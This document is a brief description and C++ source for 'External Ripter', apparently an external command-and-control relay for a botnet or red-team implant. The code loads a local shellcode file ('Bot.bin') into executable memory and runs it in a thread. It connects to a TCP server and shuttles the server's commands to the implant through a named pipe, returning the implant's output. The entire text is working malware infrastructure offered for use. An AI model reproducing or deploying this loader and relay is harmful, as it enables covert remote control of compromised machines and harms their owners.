External Ripter
Connecting the bot to the server using the tcp protocol:
You need to get 4 bytes (message size) and message. The sending is the same - we send 4 bytes and a message. The example shows loading a local payload. After loading the payload, run it in a thread and communicate with it via the named pipe "\\\\. \\ pipe \\ ExternalRipter".
#include <iostream>
#include <process.h>
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib, "Ws2_32.lib")
#define PORT 8888
#define SERVERADDR "127.0.0.1"
#define BUFFER_MAX_SIZE 1024 * 1024
HANDLE connectPipe(const char* Name)
{
HANDLE beaconPipe = INVALID_HANDLE_VALUE;
while (beaconPipe == INVALID_HANDLE_VALUE) {
Sleep(1000);
beaconPipe = CreateFileA(Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, NULL, NULL);
}
return beaconPipe;
}
BOOL sendPipe(HANDLE p, const char* data, DWORD len)
{
DWORD bytesWritten = 0;
BOOL r = WriteFile(p, &len, 4, &bytesWritten, NULL);
r = WriteFile(p, data, len, &bytesWritten, NULL);
return r;
}
char* recvPipe(HANDLE pipe, DWORD* len) {
char* buffer;
DWORD b = 0, t = 0;
*len = 0;
BOOL r = ReadFile(pipe, len, 4, &b, NULL);
buffer = (char*)malloc(*len);
while (t < *len) {
r = ReadFile(pipe, buffer + t, *len - t, &b, NULL);
t += b;
}
if (r == FALSE)
return (char*)"null";
return buffer;
}
DWORD recv_Server(SOCKET my_socket) {
DWORD size = 0;
/* read the 4-byte length */
recv(my_socket, (char*)&size, 4, 0);
return size;
}
DWORD recv_Server2(SOCKET my_socket, char* buffer, DWORD size)
{
DWORD total = 0, temp = 0;
/* read in the result */
while (total < size) {
temp = recv(my_socket, buffer + total, size - total, 0);
total += temp;
}
return size;
}
void send_Server(SOCKET my_socket, char* buffer, int length) {
send(my_socket, (char*)&length, 4, 0);
send(my_socket, buffer, length, 0);
}
char* getBytes(std::string path)
{
HANDLE hFile = CreateFileA(path.c_str(), GENERIC_READ, 0, 0, OPEN_EXISTING, NULL, NULL);
DWORD fileSize = GetFileSize(hFile, NULL);
void* base = VirtualAlloc(NULL, fileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
DWORD dw;
ReadFile(hFile, base, fileSize, &dw, NULL);
_beginthread((_beginthread_proc_type)base, 0, NULL);
return 0;
}
int main()
{
char buff[1024];
if (WSAStartup(0x202, (WSADATA*)&buff[0]))
{
printf("WSAStart error %d\n", WSAGetLastError());
return -1;
}
SOCKET my_sock;
my_sock = socket(AF_INET, SOCK_STREAM, 0);
if (my_sock < 0)
{
printf("Socket() error %d\n", WSAGetLastError());
return -1;
}
sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);
HOSTENT* hst;
if (inet_addr(SERVERADDR) != INADDR_NONE)
dest_addr.sin_addr.s_addr = inet_addr(SERVERADDR);
else
{
if (hst = gethostbyname(SERVERADDR))
((unsigned long*)&dest_addr.sin_addr)[0] =
((unsigned long**)hst->h_addr_list)[0][0];
else
{
printf("Invalid address %s\n", SERVERADDR);
closesocket(my_sock);
WSACleanup();
return -1;
}
}
bool con = true;
while (con)
{
if (connect(my_sock, (sockaddr*)&dest_addr, sizeof(dest_addr)) == 0)
con = false;
}
getBytes("Bot.bin");
HANDLE hPipe = connectPipe("\\\\.\\pipe\\ExternalRipter");
DWORD pLen = 0;
while (true)
{
int size = recv_Server(my_sock);//получили команду от сервера
char* buffer = (char*)malloc(size);
std::cout << "\n size byte: \n";
std::cout << size;
recv_Server2(my_sock, buffer, size);//получили команду от сервера
std::cout << "\n get msg server:\n";
std::cout << buffer;
if(!sendPipe(hPipe, buffer, size))
break;//отправили команду на pipe
std::cout << "\n send to pipe: \n";
std::cout << buffer;
std::string data = recvPipe(hPipe, &pLen);//Получили ответ от pipe
if (data == "null")
break;
std::cout << "\n get from pipe: \n";
std::cout << data;
std::cout << "\n send to server \n";
send_Server(my_sock, (char*)data.c_str(), pLen);//отправили ответ серверу
}
printf("Recv error %d\n", WSAGetLastError());
closesocket(my_sock);
WSACleanup();
return -1;
}